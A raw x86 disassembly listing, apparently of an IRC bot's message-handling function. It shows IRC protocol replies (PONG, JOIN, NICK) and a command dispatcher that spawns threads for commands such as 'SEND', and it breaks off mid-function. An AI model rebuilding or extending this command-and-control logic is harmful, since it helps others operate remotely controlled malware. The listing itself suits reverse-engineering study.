var_4188 = byte ptr -4188h
var_4088 = byte ptr -4088h
var_3F88 = dword ptr -3F88h
var_3F84 = byte ptr -3F84h
var_3F04 = byte ptr -3F04h
var_3E00 = byte ptr -3E00h
var_3CFC = dword ptr -3CFCh
var_3CF8 = dword ptr -3CF8h
var_3CF4 = dword ptr -3CF4h
var_3CF0 = dword ptr -3CF0h
var_3CEC = dword ptr -3CECh
var_3CE8 = dword ptr -3CE8h
var_3CE4 = byte ptr -3CE4h
var_3C64 = byte ptr -3C64h
var_3BE4 = byte ptr -3BE4h
var_3B64 = byte ptr -3B64h
var_3AE4 = byte ptr -3AE4h
var_3A64 = dword ptr -3A64h
var_3A60 = dword ptr -3A60h
var_3A5C = dword ptr -3A5Ch
var_3A58 = dword ptr -3A58h
var_3A54 = byte ptr -3A54h
var_37CD = byte ptr -37CDh
var_37CC = byte ptr -37CCh
var_36C8 = dword ptr -36C8h
var_36C0 = dword ptr -36C0h
var_36BC = dword ptr -36BCh
var_36B8 = dword ptr -36B8h
var_36B4 = dword ptr -36B4h
var_36AC = dword ptr -36ACh
var_36A8 = dword ptr -36A8h
var_36A4 = byte ptr -36A4h
var_3624 = byte ptr -3624h
var_35A4 = byte ptr -35A4h
var_3524 = byte ptr -3524h
var_34A4 = dword ptr -34A4h
var_34A0 = dword ptr -34A0h
var_349C = dword ptr -349Ch
var_3498 = dword ptr -3498h
var_3494 = dword ptr -3494h
var_3490 = byte ptr -3490h
var_3410 = byte ptr -3410h
var_3390 = byte ptr -3390h
var_3310 = byte ptr -3310h
var_3290 = dword ptr -3290h
var_328C = dword ptr -328Ch
var_3288 = dword ptr -3288h
var_3284 = dword ptr -3284h
var_3280 = dword ptr -3280h
var_327C = byte ptr -327Ch
var_31FC = byte ptr -31FCh
var_317C = byte ptr -317Ch
var_30FC = byte ptr -30FCh
var_307C = dword ptr -307Ch
var_3078 = dword ptr -3078h
var_3074 = dword ptr -3074h
var_3070 = dword ptr -3070h
var_306C = dword ptr -306Ch
var_3068 = byte ptr -3068h
var_2FE8 = byte ptr -2FE8h
var_2F68 = byte ptr -2F68h
var_2EE8 = byte ptr -2EE8h
var_2E68 = dword ptr -2E68h
var_2E64 = dword ptr -2E64h
var_2E60 = dword ptr -2E60h
var_2E5C = dword ptr -2E5Ch
var_2E58 = byte ptr -2E58h
var_2D54 = dword ptr -2D54h
var_2D50 = byte ptr -2D50h
var_2C4C = byte ptr -2C4Ch
var_2B48 = dword ptr -2B48h
var_2B44 = dword ptr -2B44h
var_2B40 = dword ptr -2B40h
var_2B3C = byte ptr -2B3Ch
var_2ABC = dword ptr -2ABCh
var_2AB8 = dword ptr -2AB8h
var_2AB4 = dword ptr -2AB4h
var_2AB0 = dword ptr -2AB0h
var_2AA8 = byte ptr -2AA8h
var_2990 = byte ptr -2990h
var_2910 = dword ptr -2910h
var_290C = dword ptr -290Ch
var_2908 = dword ptr -2908h
var_2904 = dword ptr -2904h
var_2900 = dword ptr -2900h
var_28FC = dword ptr -28FCh
var_28F8 = byte ptr -28F8h
var_2878 = byte ptr -2878h
var_2778 = byte ptr -2778h
var_2678 = dword ptr -2678h
var_2674 = dword ptr -2674h
var_2670 = dword ptr -2670h
var_266C = dword ptr -266Ch
var_2668 = dword ptr -2668h
var_2664 = dword ptr -2664h
var_2660 = dword ptr -2660h
var_265C = dword ptr -265Ch
var_2658 = dword ptr -2658h
var_2654 = dword ptr -2654h
var_2650 = byte ptr -2650h
var_25D0 = byte ptr -25D0h
var_24D0 = byte ptr -24D0h
var_23D0 = dword ptr -23D0h
var_23CC = dword ptr -23CCh
var_23C8 = dword ptr -23C8h
var_23C4 = dword ptr -23C4h
var_23C0 = dword ptr -23C0h
var_23BC = dword ptr -23BCh
var_23B8 = dword ptr -23B8h
var_23B4 = dword ptr -23B4h
var_23B0 = dword ptr -23B0h
var_23AC = dword ptr -23ACh
var_23A8 = byte ptr -23A8h
var_2328 = byte ptr -2328h
var_22A8 = byte ptr -22A8h
var_2228 = dword ptr -2228h
var_2224 = dword ptr -2224h
var_2220 = dword ptr -2220h
var_221C = dword ptr -221Ch
var_2218 = dword ptr -2218h
var_2214 = byte ptr -2214h
var_2194 = byte ptr -2194h
var_2114 = byte ptr -2114h
var_2094 = dword ptr -2094h
var_2090 = dword ptr -2090h
var_208C = dword ptr -208Ch
var_2088 = dword ptr -2088h
var_2084 = dword ptr -2084h
var_2080 = byte ptr -2080h
var_2000 = byte ptr -2000h
var_1F80 = byte ptr -1F80h
var_1F00 = dword ptr -1F00h
var_1EFC = dword ptr -1EFCh
var_1EF8 = dword ptr -1EF8h
var_1EF4 = dword ptr -1EF4h
var_1EF0 = dword ptr -1EF0h
var_1EEC = byte ptr -1EECh
var_1DEC = byte ptr -1DECh
var_1D6C = dword ptr -1D6Ch
var_1D64 = dword ptr -1D64h
var_1D60 = dword ptr -1D60h
var_1D5C = dword ptr -1D5Ch
var_1D58 = dword ptr -1D58h
var_1D54 = dword ptr -1D54h
var_1D50 = dword ptr -1D50h
var_1D48 = byte ptr -1D48h
var_1D34 = byte ptr -1D34h
var_1C30 = byte ptr -1C30h
var_1BAC = dword ptr -1BACh
var_1BA8 = dword ptr -1BA8h
var_1BA4 = dword ptr -1BA4h
var_1BA0 = dword ptr -1BA0h
var_1B9C = dword ptr -1B9Ch
var_1B94 = byte ptr -1B94h
var_1B80 = byte ptr -1B80h
var_1A7C = byte ptr -1A7Ch
var_19FC = dword ptr -19FCh
var_19F8 = dword ptr -19F8h
var_19F4 = dword ptr -19F4h
var_19F0 = dword ptr -19F0h
var_19EC = dword ptr -19ECh
var_19E8 = dword ptr -19E8h
var_19E4 = byte ptr -19E4h
var_1964 = byte ptr -1964h
var_1924 = byte ptr -1924h
var_1824 = dword ptr -1824h
var_1820 = dword ptr -1820h
var_1814 = dword ptr -1814h
var_1810 = dword ptr -1810h
var_180C = dword ptr -180Ch
var_1808 = byte ptr -1808h
var_17D0 = byte ptr -17D0h
var_17B4 = byte ptr -17B4h
var_177C = byte ptr -177Ch
var_1778 = byte ptr -1778h
var_16F8 = byte ptr -16F8h
var_16B8 = byte ptr -16B8h
var_1628 = dword ptr -1628h
var_1624 = dword ptr -1624h
var_1620 = dword ptr -1620h
var_161C = dword ptr -161Ch
var_1618 = dword ptr -1618h
var_1614 = byte ptr -1614h
var_1594 = byte ptr -1594h
var_1514 = dword ptr -1514h
var_1510 = dword ptr -1510h
var_150C = dword ptr -150Ch
var_1508 = dword ptr -1508h
var_1504 = byte ptr -1504h
var_14F4 = byte ptr -14F4h
var_1474 = byte ptr -1474h
var_13F4 = dword ptr -13F4h
var_13EC = dword ptr -13ECh
var_13E8 = dword ptr -13E8h
var_13E4 = dword ptr -13E4h
var_13E0 = dword ptr -13E0h
var_13DC = dword ptr -13DCh
var_13D8 = dword ptr -13D8h
var_13D4 = byte ptr -13D4h
var_1354 = byte ptr -1354h
var_12D4 = byte ptr -12D4h
var_1254 = dword ptr -1254h
var_1250 = dword ptr -1250h
var_124C = dword ptr -124Ch
var_1248 = dword ptr -1248h
var_1244 = dword ptr -1244h
var_1240 = dword ptr -1240h
var_123C = dword ptr -123Ch
var_1238 = dword ptr -1238h
var_1230 = byte ptr -1230h
var_11B0 = byte ptr -11B0h
var_1130 = dword ptr -1130h
var_112C = dword ptr -112Ch
var_1128 = dword ptr -1128h
var_1120 = dword ptr -1120h
var_111C = dword ptr -111Ch
var_1118 = dword ptr -1118h
var_1110 = dword ptr -1110h
var_110C = byte ptr -110Ch
var_108C = byte ptr -108Ch
var_100C = dword ptr -100Ch
var_1008 = dword ptr -1008h
var_1004 = dword ptr -1004h
var_FFC = dword ptr -0FFCh
var_FF8 = dword ptr -0FF8h
var_FF4 = dword ptr -0FF4h
var_FF0 = dword ptr -0FF0h
var_FEC = dword ptr -0FECh
var_FE8 = byte ptr -0FE8h
var_F68 = dword ptr -0F68h
var_F64 = dword ptr -0F64h
var_F60 = dword ptr -0F60h
var_F5C = dword ptr -0F5Ch
var_F58 = dword ptr -0F58h
var_F54 = byte ptr -0F54h
var_ED4 = dword ptr -0ED4h
var_ED0 = dword ptr -0ED0h
var_ECC = dword ptr -0ECCh
var_EC8 = dword ptr -0EC8h
var_EC4 = dword ptr -0EC4h
var_EC0 = byte ptr -0EC0h
var_E40 = dword ptr -0E40h
var_E3C = dword ptr -0E3Ch
var_E38 = dword ptr -0E38h
var_E34 = dword ptr -0E34h
var_E30 = byte ptr -0E30h
var_E10 = byte ptr -0E10h
var_E00 = byte ptr -0E00h
var_D80 = dword ptr -0D80h
var_D7C = byte ptr -0D7Ch
var_CFC = byte ptr -0CFCh
var_C7C = dword ptr -0C7Ch
var_C78 = dword ptr -0C78h
var_C74 = dword ptr -0C74h
var_C70 = dword ptr -0C70h
var_C6C = dword ptr -0C6Ch
var_C68 = dword ptr -0C68h
var_C64 = dword ptr -0C64h
var_C60 = dword ptr -0C60h
var_C5C = dword ptr -0C5Ch
var_C58 = dword ptr -0C58h
var_C54 = byte ptr -0C54h
var_BD4 = dword ptr -0BD4h
var_BD0 = dword ptr -0BD0h
var_BCC = dword ptr -0BCCh
var_BC8 = dword ptr -0BC8h
var_BC4 = byte ptr -0BC4h
var_B44 = dword ptr -0B44h
var_B40 = dword ptr -0B40h
var_B3C = dword ptr -0B3Ch
var_B38 = dword ptr -0B38h
var_B34 = dword ptr -0B34h
var_B30 = dword ptr -0B30h
var_B2C = byte ptr -0B2Ch
var_AAC = dword ptr -0AACh
var_AA8 = dword ptr -0AA8h
var_AA4 = dword ptr -0AA4h
var_AA0 = dword ptr -0AA0h
var_A9C = dword ptr -0A9Ch
var_A98 = dword ptr -0A98h
var_A94 = byte ptr -0A94h
var_A14 = dword ptr -0A14h
var_A10 = dword ptr -0A10h
var_A0C = dword ptr -0A0Ch
var_A08 = dword ptr -0A08h
var_A04 = dword ptr -0A04h
var_A00 = dword ptr -0A00h
var_9FC = byte ptr -9FCh
var_97C = word ptr -97Ch
var_978 = dword ptr -978h
var_970 = dword ptr -970h
var_96C = dword ptr -96Ch
var_968 = dword ptr -968h
var_960 = byte ptr -960h
var_8FF = byte ptr -8FFh
var_8FE = byte ptr -8FEh
var_8FC = byte ptr -8FCh
var_8FB = byte ptr -8FBh
var_8F2 = byte ptr -8F2h
var_8F0 = byte ptr -8F0h
var_8EE = byte ptr -8EEh
var_8ED = byte ptr -8EDh
var_860 = byte ptr -860h
var_850 = byte ptr -850h
var_7D0 = byte ptr -7D0h
var_750 = dword ptr -750h
var_74C = dword ptr -74Ch
var_748 = dword ptr -748h
var_744 = dword ptr -744h
var_740 = dword ptr -740h
var_734 = dword ptr -734h
var_730 = dword ptr -730h
var_728 = dword ptr -728h
var_724 = dword ptr -724h
var_720 = dword ptr -720h
var_71C = dword ptr -71Ch
var_714 = dword ptr -714h
var_710 = byte ptr -710h
var_690 = dword ptr -690h
var_688 = dword ptr -688h
var_684 = dword ptr -684h
var_680 = dword ptr -680h
var_678 = dword ptr -678h
var_674 = dword ptr -674h
var_670 = dword ptr -670h
var_668 = dword ptr -668h
var_63C = dword ptr -63Ch
var_638 = word ptr -638h
var_624 = dword ptr -624h
var_620 = byte ptr -620h
var_5A0 = byte ptr -5A0h
var_590 = dword ptr -590h
var_58C = dword ptr -58Ch
var_584 = dword ptr -584h
var_580 = dword ptr -580h
var_57C = dword ptr -57Ch
var_574 = dword ptr -574h
var_570 = byte ptr -570h
var_4F0 = dword ptr -4F0h
var_4EC = dword ptr -4ECh
var_4E8 = dword ptr -4E8h
var_4E4 = dword ptr -4E4h
var_4E0 = dword ptr -4E0h
var_4D8 = dword ptr -4D8h
var_4D4 = dword ptr -4D4h
var_4D0 = dword ptr -4D0h
var_4C8 = byte ptr -4C8h
var_4BC = byte ptr -4BCh
var_484 = byte ptr -484h
var_474 = byte ptr -474h
var_3F4 = byte ptr -3F4h
var_374 = dword ptr -374h
var_370 = dword ptr -370h
var_36C = dword ptr -36Ch
var_368 = dword ptr -368h
var_364 = dword ptr -364h
var_358 = dword ptr -358h
var_354 = dword ptr -354h
var_34C = dword ptr -34Ch
var_348 = dword ptr -348h
var_344 = dword ptr -344h
var_340 = dword ptr -340h
var_338 = byte ptr -338h
var_31C = word ptr -31Ch
var_31A = word ptr -31Ah
var_318 = dword ptr -318h
var_30C = byte ptr -30Ch
var_308 = dword ptr -308h
var_2FC = byte ptr -2FCh
var_2F8 = byte ptr -2F8h
var_2F4 = dword ptr -2F4h
var_2E8 = byte ptr -2E8h
var_2E4 = byte ptr -2E4h
var_2E3 = byte ptr -2E3h
var_2E2 = byte ptr -2E2h
var_2D8 = dword ptr -2D8h
var_2D4 = dword ptr -2D4h
var_2D0 = dword ptr -2D0h
var_2CC = dword ptr -2CCh
var_2C8 = dword ptr -2C8h
var_2C4 = dword ptr -2C4h
var_2C0 = byte ptr -2C0h
var_C0 = byte ptr -0C0h
var_A8 = dword ptr -0A8h
var_A4 = dword ptr -0A4h
var_A0 = byte ptr -0A0h
var_94 = byte ptr -94h
var_93 = byte ptr -93h
var_92 = byte ptr -92h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_50 = byte ptr -50h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
arg_28 = dword ptr 30h
push ebp
mov ebp, esp
mov eax, 5D88h
call sub_41EF80
push ebx
push esi
mov esi, 200h
push edi
xor ebx, ebx
push esi
lea eax, [ebp+var_2C0]
push ebx
push eax
mov [ebp+var_A4], 3
mov [ebp+var_10], ebx
mov [ebp+var_A8], ebx
mov [ebp+var_8], ebx
mov [ebp+var_4], ebx
mov [ebp+var_2C4], ebx
call sub_41E4B0
push 1Bh
lea eax, [ebp+var_338]
push [ebp+arg_10]
push eax
call sub_41E510
add esp, 18h
cmp [ebp+arg_0], ebx
jz loc_4076C4
push esi
lea eax, [ebp+var_4488]
push ebx
push eax
call sub_41E4B0
dec esi
lea eax, [ebp+var_4488]
push esi
push [ebp+arg_0]
push eax
call sub_41E510
lea eax, [ebp+var_4488]
push offset asc_43FB88 ; " :"
push eax
call sub_41EBB0
mov [ebp+var_C], eax
lea eax, [ebp+var_4488]
push esi
push eax
lea eax, [ebp+var_4AF0]
push eax
call sub_41E510
lea eax, [ebp+var_4AF0]
push offset asc_43FB8C ; " !"
push eax
call sub_41F870
xor edi, edi
add esp, 34h
inc edi
mov [ebp+var_90], eax
mov esi, edi
loc_401D4E: ; CODE XREF: sub_401C87+DF�j
push 43FB8Eh
push ebx
call sub_41F870
mov [ebp+esi*4+var_90], eax
inc esi
pop ecx
cmp esi, 20h
pop ecx
jl short loc_401D4E
mov esi, [ebp+var_90]
cmp esi, ebx
jz loc_409C28
cmp [ebp+var_8C], ebx
jz loc_409C28
push 100h
lea eax, [ebp+var_960]
push ebx
push eax
call sub_41E4B0
add esp, 0Ch
push 1Fh
pop edx
loc_401D9A: ; CODE XREF: sub_401C87+147�j
lea ecx, [ebp+edx*4+var_90]
mov eax, [ecx]
cmp eax, ebx
jz short loc_401DCD
cmp byte ptr [eax], 2Dh
jnz short loc_401DD0
cmp [eax+2], bl
jnz short loc_401DD0
movsx esi, byte ptr [eax+1]
mov [ecx], ebx
mov [ebp+esi+var_960], 1
mov esi, [ebp+var_90]
mov [eax], bl
mov [eax+1], bl
mov [eax+2], bl
loc_401DCD: ; CODE XREF: sub_401C87+11E�j
dec edx
jns short loc_401D9A
loc_401DD0: ; CODE XREF: sub_401C87+123�j
; sub_401C87+128�j
cmp [ebp+var_8ED], bl
jz short loc_401DDB
mov [ebp+var_8], edi
loc_401DDB: ; CODE XREF: sub_401C87+14F�j
cmp [ebp+var_8F2], bl
jz short loc_401DE9
mov [ebp+var_8], ebx
mov [ebp+var_4], edi
loc_401DE9: ; CODE XREF: sub_401C87+15A�j
cmp byte ptr [esi], 0Ah
jz short loc_401E23
push 7Fh
lea eax, [ebp+var_E00]
push esi
push eax
call sub_41E510
lea eax, [esi+1]
push 17h
push eax
lea eax, [ebp+var_C0]
push eax
call sub_41E510
lea eax, [ebp+var_C0]
push 43FB90h
push eax
call sub_41F870
add esp, 20h
loc_401E23: ; CODE XREF: sub_401C87+165�j
push esi
push offset aPing ; "PING"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz short loc_401E74
push [ebp+var_8C]
mov byte ptr [esi+1], 4Fh
push offset aPongS ; "PONG %s\r\n"
push [ebp+arg_4]
call sub_409C2F
mov eax, [ebp+arg_20]
add esp, 0Ch
cmp [eax], ebx
jnz loc_409C28
push [ebp+arg_C]
push [ebp+arg_8]
push offset aJoinSS ; "JOIN %s %s\r\n"
push [ebp+arg_4]
call sub_409C2F
add esp, 10h
jmp loc_409C28
; ---------------------------------------------------------------------------
loc_401E74: ; CODE XREF: sub_401C87+1AB�j
mov esi, [ebp+var_8C]
push esi
push offset a001 ; "001"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_409BE7
push esi
push offset a005 ; "005"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_409BE7
push esi
push offset a302 ; "302"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz short loc_401EE6
push offset a@ ; "@"
push [ebp+var_84]
call sub_41EBB0
pop ecx
cmp eax, ebx
pop ecx
jz loc_409C28
inc eax
push 9Fh
push eax
push [ebp+arg_1C]
call sub_41E510
add esp, 0Ch
jmp loc_409C28
; ---------------------------------------------------------------------------
loc_401EE6: ; CODE XREF: sub_401C87+22C�j
push esi
push offset a433 ; "433"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz short loc_401F24
push ebx
push ds:dword_43F0A4
push ds:dword_43F0A0
push [ebp+arg_10]
call sub_40B38F
push [ebp+arg_10]
push offset aNickS ; "NICK %s\r\n"
push [ebp+arg_4]
call sub_409C2F
add esp, 1Ch
jmp loc_409C28
; ---------------------------------------------------------------------------
loc_401F24: ; CODE XREF: sub_401C87+26E�j
mov esi, [ebp+arg_18]
mov [ebp+var_2C8], 3
mov edi, 80h
loc_401F36: ; CODE XREF: sub_401C87+2D4�j
lea eax, [ebp+var_E00]
push eax
push esi
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz short loc_401F53
mov [ebp+var_A8], 1
loc_401F53: ; CODE XREF: sub_401C87+2C0�j
add esi, edi
dec [ebp+var_2C8]
jnz short loc_401F36
mov esi, [ebp+var_8C]
push esi
push offset aKick ; "KICK"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz loc_40203F
mov esi, [ebp+arg_18]
mov [ebp+arg_24], 3
loc_401F82: ; CODE XREF: sub_401C87+37A�j
cmp [esi], bl
jz short loc_401FFC
push 7Fh
lea eax, [ebp+var_E00]
push esi
push eax
call sub_41E510
add esp, 0Ch
cmp [ebp+var_84], ebx
jz short loc_401FFC
push [ebp+var_84]
lea eax, [ebp+var_C0]
push eax
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz short loc_401FFC
lea eax, [ebp+var_C0]
mov [esi], bl
push eax
lea eax, [ebp+var_2C0]
push offset unk_43FBE0
push eax
call sub_41EA60
lea eax, [ebp+var_2C0]
push eax
lea eax, [ebp+var_C0]
push eax
push offset aNoticeSS ; "NOTICE %s :%s\r\n"
push [ebp+arg_4]
call sub_409C2F
lea eax, [ebp+var_2C0]
push eax
call sub_415A3C
add esp, 20h
loc_401FFC: ; CODE XREF: sub_401C87+2FD�j
; sub_401C87+317�j ...
add esi, edi
dec [ebp+arg_24]
jnz loc_401F82
push [ebp+var_84]
push [ebp+arg_10]
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz loc_4076C4
push [ebp+arg_C]
mov eax, [ebp+arg_20]
push [ebp+arg_8]
mov [eax], ebx
push offset aJoinSS_0 ; "JOIN %s %s\r\n"
loc_40202F: ; CODE XREF: sub_401C87+5EE�j
; sub_401C87+886�j ...
push [ebp+arg_4]
call sub_409C2F
loc_402037: ; CODE XREF: sub_401C87+24F5�j
; sub_401C87+2512�j ...
add esp, 10h
jmp loc_4076C4
; ---------------------------------------------------------------------------
loc_40203F: ; CODE XREF: sub_401C87+2EB�j
push esi
push offset aNick ; "NICK"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz loc_402187
mov eax, [ebp+var_88]
mov esi, [ebp+arg_18]
inc eax
mov [ebp+arg_0], 3
mov [ebp+arg_24], eax
loc_402068: ; CODE XREF: sub_401C87+433�j
lea eax, [ebp+var_E00]
push eax
push esi
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz short loc_4020B5
lea eax, [ebp+var_E00]
push 21h
push eax
call sub_41F720
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+arg_1C], eax
jz short loc_4020B5
push [ebp+arg_24]
lea edi, [esi+2]
mov byte ptr [esi], 3Ah
lea eax, [edi-1]
push eax
call sub_41F620
push [ebp+arg_1C]
push edi
call sub_41F630
add esp, 10h
mov edi, 80h
loc_4020B5: ; CODE XREF: sub_401C87+3F2�j
; sub_401C87+409�j
add esi, edi
dec [ebp+arg_0]
jnz short loc_402068
cmp [ebp+arg_24], ebx
jz loc_4076C4
push [ebp+arg_10]
lea eax, [ebp+var_C0]
push eax
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz short loc_4020EF
push 0Fh
push [ebp+arg_24]
push [ebp+arg_10]
call sub_41E510
loc_4020E7: ; CODE XREF: sub_401C87+1BE6�j
add esp, 0Ch
jmp loc_4076C4
; ---------------------------------------------------------------------------
loc_4020EF: ; CODE XREF: sub_401C87+451�j
mov edi, [ebp+arg_18]
xor esi, esi
loc_4020F4: ; CODE XREF: sub_401C87+48E�j
cmp [edi], bl
jz short loc_40210B
lea eax, [ebp+var_E00]
push eax
push edi
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz short loc_40211C
loc_40210B: ; CODE XREF: sub_401C87+46F�j
inc esi
add edi, 80h
cmp esi, 3
jl short loc_4020F4
jmp loc_4076C4
; ---------------------------------------------------------------------------
loc_40211C: ; CODE XREF: sub_401C87+482�j
lea eax, [ebp+var_E00]
push 21h
push eax
call sub_41F720
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+arg_0], eax
jz loc_4076C4
push eax
call sub_41BC70
push [ebp+arg_24]
mov edi, eax
call sub_41BC70
add edi, eax
pop ecx
cmp edi, 7Eh
pop ecx
ja loc_4076C4
push [ebp+arg_0]
shl esi, 7
push [ebp+arg_24]
add esi, [ebp+arg_18]
push offset aSS ; ":%s%s"
push esi
call sub_41EA60
push ebx
lea eax, [ebp+var_45EC]
push ebx
push eax
push [ebp+arg_8]
push [ebp+arg_4]
call sub_409C75
add esp, 24h
jmp loc_4076C4
; ---------------------------------------------------------------------------
loc_402187: ; CODE XREF: sub_401C87+3C7�j
push esi
push offset aPart ; "PART"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz short loc_4021A9
push esi
push offset aQuit ; "QUIT"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz short loc_4021D6
loc_4021A9: ; CODE XREF: sub_401C87+50F�j
mov edi, [ebp+arg_18]
xor esi, esi
loc_4021AE: ; CODE XREF: sub_401C87+547�j
cmp [edi], bl
jz short loc_4021C4
push [ebp+var_90]
push edi
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz short loc_402219
loc_4021C4: ; CODE XREF: sub_401C87+529�j
inc esi
add edi, 80h
cmp esi, 3
jl short loc_4021AE
mov esi, [ebp+var_8C]
loc_4021D6: ; CODE XREF: sub_401C87+520�j
push esi
push offset a353 ; "353"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz loc_40227A
push [ebp+var_80]
push [ebp+arg_8]
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz short loc_402205
mov eax, [ebp+arg_20]
mov dword ptr [eax], 1
loc_402205: ; CODE XREF: sub_401C87+573�j
push [ebp+var_80]
push offset unk_43FC44
loc_40220D: ; CODE XREF: sub_401C87+2877�j
; sub_401C87+2C2F�j ...
call sub_415AB0
loc_402212: ; CODE XREF: sub_401C87+1B92�j
pop ecx
loc_402213: ; CODE XREF: sub_401C87+590F�j
pop ecx
jmp loc_4076C4
; ---------------------------------------------------------------------------
loc_402219: ; CODE XREF: sub_401C87+53B�j
mov eax, [ebp+arg_18]
shl esi, 7
mov [esi+eax], bl
lea eax, [ebp+var_C0]
push eax
lea eax, [ebp+var_2C0]
push offset unk_43FC64
push eax
call sub_41EA60
lea eax, [ebp+var_2C0]
push eax
call sub_415A3C
push [ebp+var_8C]
push offset aPart_0 ; "PART"
call sub_41F7E0
add esp, 18h
test eax, eax
jnz loc_4076C4
lea eax, [ebp+var_2C0]
push eax
mov eax, [ebp+var_90]
inc eax
push eax
push offset aNoticeSS_0 ; "NOTICE %s :%s\r\n"
jmp loc_40202F
; ---------------------------------------------------------------------------
loc_40227A: ; CODE XREF: sub_401C87+55E�j
push esi
push offset aPrivmsg ; "PRIVMSG"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz short loc_4022BD
push esi
push offset aNotice ; "NOTICE"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz short loc_4022BD
push esi
push offset a332 ; "332"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz loc_409A67
cmp ds:dword_43F08C, ebx
jz loc_409A67
loc_4022BD: ; CODE XREF: sub_401C87+602�j
; sub_401C87+613�j
push esi
push offset aPrivmsg_0 ; "PRIVMSG"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_402431
push esi
push offset aNotice_0 ; "NOTICE"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz loc_402431
mov eax, [ebp+var_84]
inc [ebp+var_80]
mov [ebp+var_A4], 4
mov [ebp+var_88], eax
loc_402300: ; CODE XREF: sub_401C87+864�j
; sub_401C87+89A�j ...
mov eax, [ebp+var_A4]
mov esi, eax
shl esi, 2
lea edi, [ebp+esi+var_90]
mov eax, [edi]
push eax
push offset dword_43FCC4
mov [ebp+arg_8], eax
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz loc_4026D0
push [ebp+esi+var_8C]
push offset aSend_1 ; "SEND"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz loc_40259B
cmp [ebp+var_A8], ebx
jz loc_402571
push [ebp+esi+var_88]
lea eax, [ebp+var_1B80]
push offset aS_20 ; "%s"
push eax
call sub_41EA60
push [ebp+esi+var_84]
lea eax, [ebp+var_1B94]
push offset aS_21 ; "%s"
push eax
call sub_41EA60
push [ebp+esi+var_80]
call sub_41E710
mov [ebp+var_19FC], eax
mov eax, [ebp+arg_4]
mov [ebp+var_1B9C], eax
lea eax, [ebp+var_C0]
push 7Fh
push eax
lea eax, [ebp+var_1A7C]
push eax
call sub_41E510
mov eax, [ebp+var_4]
mov [ebp+var_19F4], eax
mov eax, [ebp+var_8]
mov [ebp+var_19F0], eax
lea eax, [ebp+var_1A7C]
push eax
lea eax, [ebp+var_1B80]
push eax
lea eax, [ebp+var_2C0]
push offset unk_43FCDC
push eax
call sub_41EA60
push ebx
lea eax, [ebp+var_2C0]
push 1Ah
push eax
call sub_40B691
add esp, 44h
mov [ebp+var_19F8], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_1B9C]
push ebx
push eax
push offset sub_416B2D
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_19F8]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_455F14[ecx], eax
jz loc_402560
jmp loc_402556
; ---------------------------------------------------------------------------
loc_402431: ; CODE XREF: sub_401C87+645�j
; sub_401C87+65A�j
push esi
push offset aNotice_1 ; "NOTICE"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz short loc_402449
mov [ebp+var_4], 1
loc_402449: ; CODE XREF: sub_401C87+7B9�j
mov edi, [ebp+var_88]
cmp edi, ebx
jz loc_4076C4
push offset asc_43FD14 ; "#"
push edi
call sub_41EBB0
pop ecx
test eax, eax
pop ecx
jz short loc_40246D
cmp [ebp+var_4], ebx
jz short loc_402479
loc_40246D: ; CODE XREF: sub_401C87+7DF�j
lea edi, [ebp+var_C0]
mov [ebp+var_88], edi
loc_402479: ; CODE XREF: sub_401C87+7E4�j
cmp [ebp+var_84], ebx
jz loc_4076C4
inc [ebp+var_84]
jz short loc_4024C1
cmp [ebp+arg_10], ebx
jz short loc_4024C1
lea eax, [ebp+var_338]
push eax
call sub_41BC70
push eax
lea eax, [ebp+var_338]
push [ebp+var_84]
push eax
call sub_41F5E0
add esp, 10h
neg eax
sbb eax, eax
add eax, 4
mov [ebp+var_A4], eax
loc_4024C1: ; CODE XREF: sub_401C87+804�j
; sub_401C87+809�j
mov eax, [ebp+var_A4]
shl eax, 2
mov [ebp+arg_8], eax
mov esi, [ebp+eax+var_90]
cmp esi, ebx
jz loc_4076C4
push esi
push offset dword_43FD18
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz loc_402300
cmp byte ptr [edi], 23h
jz short loc_402512
mov eax, ds:dword_4E2E74
mov eax, ds:off_43F1DC[eax*4]
cmp [eax], bl
jz short loc_402512
push eax
push edi
push offset dword_43FD24
jmp loc_40202F
; ---------------------------------------------------------------------------
loc_402512: ; CODE XREF: sub_401C87+86D�j
; sub_401C87+87D�j
push esi
push offset dword_43FD40
